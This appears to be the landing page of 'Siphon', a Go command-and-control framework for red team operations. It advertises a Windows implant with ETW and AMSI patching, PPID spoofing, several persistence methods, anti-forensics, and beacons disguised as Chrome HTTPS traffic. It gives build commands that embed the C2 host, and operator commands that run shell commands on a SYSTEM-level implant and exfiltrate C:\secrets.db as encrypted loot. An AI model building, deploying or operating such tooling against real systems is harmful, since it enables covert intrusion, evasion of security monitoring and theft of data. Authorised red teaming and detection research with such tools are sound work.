C2 with forward secrecy

Lightweight command-and-control framework built in Go. Per-session ECDH P-256 key exchange, AES-256-GCM authenticated encryption, and uTLS Chrome fingerprinting.

Download Latest View Source
siphon-server 
$ make setup && make server && make implant SERVER_PK=<hex>
generating ECDH P-256 keypair...
generating self-signed TLS certificate...
server  build/siphon-server (linux/amd64, stripped)
implant build/siphon-implant.exe (windows/amd64)

$ ./build/siphon-server -listen :443 -auth secret
listening on :443

siphon> implants
  abc123  10.10.10.5  Windows 10  SYSTEM  5s
siphon> interact abc123
siphon(abc123)> cmd whoami
nt authority\system
ECDH P-256
Key Exchange
AES-256-GCM
Encryption
uTLS Chrome
Fingerprint
0
Dependencies
FEATURES

Built for red team operations

Forward secrecy per session. Authenticated encryption on every payload. Encrypted loot at rest. Zero config files on disk.

ECDH Forward Secrecy

Ephemeral ECDH P-256 key exchange per session. Server public key embedded at build time via ldflags. Shared secrets zeroed after derivation. No config files touch disk.

$ make implant SERVER_PK=04a1b2... C2_HOST=https://10.0.0.5:443
public key embedded via -ldflags
implant build/siphon-implant.exe (windows/amd64)
P-256
ECDH Curve

AES-256-GCM Transport

Authenticated encryption for all payloads. Unique nonce per message. HMAC-SHA256 covers the full envelope: ID, PubKey, Nonce, Ciphertext.

uTLS Fingerprinting

Chrome JA3 fingerprint via HelloChrome_Auto. Cookie-based beacon transport blends with normal HTTPS traffic on standard endpoints.

Operator Console

Interactive CLI with Catppuccin Mocha palette. Prefix-match implant selection, task queuing, live result display, and encrypted loot storage.

14
Commands

Implant Builder

Cross-compile Windows implants from Linux. Server public key, C2 host, sleep interval, auth token, kill date, and custom endpoints all configured via build variables. Stripped with -s -w -trimpath.

$ make implant SERVER_PK=04a1b2... C2_HOST=https://c2:443 SLEEP_SEC=10
GOOS=windows GOARCH=amd64
build/siphon-implant.exe (stripped, no debug)

Runtime Evasion

ETW and AMSI patching on startup. PPID spoofing under explorer.exe. CREATE_NO_WINDOW for stealth process creation.

CAPABILITIES

Platform support

Server runs on Linux. Implant targets Windows with full evasion. Linux implant for testing.

ECDH P-256
AES-256-GCM
uTLS Chrome
HMAC-SHA256
Beacon Transport
File Exfiltration
File Deployment
Encrypted Loot
Self-Destruct
Sleep Control
ETW Patching
AMSI Patching
PPID Spoofing
Registry Persist
Schtask Persist
Startup Persist
Kernel Evasion
Anti-Forensics
Full   Windows Only   Out of Scope
ARCHITECTURE

Three-component design

Shared protocol types. Server with operator console. Implant with evasion and persistence. Build-time configuration via ldflags.

1

Shared Protocol

Common types for Beacon, Task, TaskResult, and Envelope. ECDH key exchange and AES-256-GCM encryption shared between server and implant.

2

C2 Server

HTTPS handlers for beacon and submit endpoints. Interactive operator console with Catppuccin Mocha palette. TLS certificate generation. Encrypted loot storage.

3

Implant

HTTPS client with uTLS Chrome fingerprint. Task dispatcher for cmd, upload, download, sleep, persist, and selfdestruct. ETW/AMSI patching and PPID spoofing on Windows.

4

Build System

Makefile targets for setup, server, implant, and implant-linux. Server public key, C2 host, and all config embedded at compile time via -ldflags.

GETTING STARTED

Build and deploy

Generate keys, build the server, cross-compile the implant. Three commands to operational.

build.sh
$ git clone https://github.com/Real-Fruit-Snacks/Siphon.git
$ cd Siphon

# Generate ECDH keypair + TLS cert
$ make setup

# Build C2 server (Linux, stripped)
$ make server

# Build implant (Windows cross-compiled)
$ make implant SERVER_PK=<hex> C2_HOST=https://c2:443
operate.sh
# Start the C2 server
$ ./build/siphon-server -listen :443 -auth secret

# Interact with implants
siphon> implants
siphon> interact abc123
siphon(abc123)> cmd whoami
nt authority\system
siphon(abc123)> upload C:\secrets.db
saved loot/abc123/secrets.db (encrypted)
DETECTION AWARENESS

Know the boundaries

Evades

  • Passive TLS inspection — Chrome JA3 fingerprint
  • ETW tracing — EtwEventWrite patched
  • AMSI scanning — AmsiScanBuffer patched
  • Process ancestry — PPID spoofed under explorer.exe
  • Traffic analysis — cookie-based HTTPS beacons

Visible To

  • Kernel-level EDR/XDR — behavioral analysis
  • Network TLS inspection proxies — decrypted traffic
  • Memory forensics — RAM inspection
  • Full disk forensics — persistence artifacts
  • SELinux, AppArmor — mandatory access controls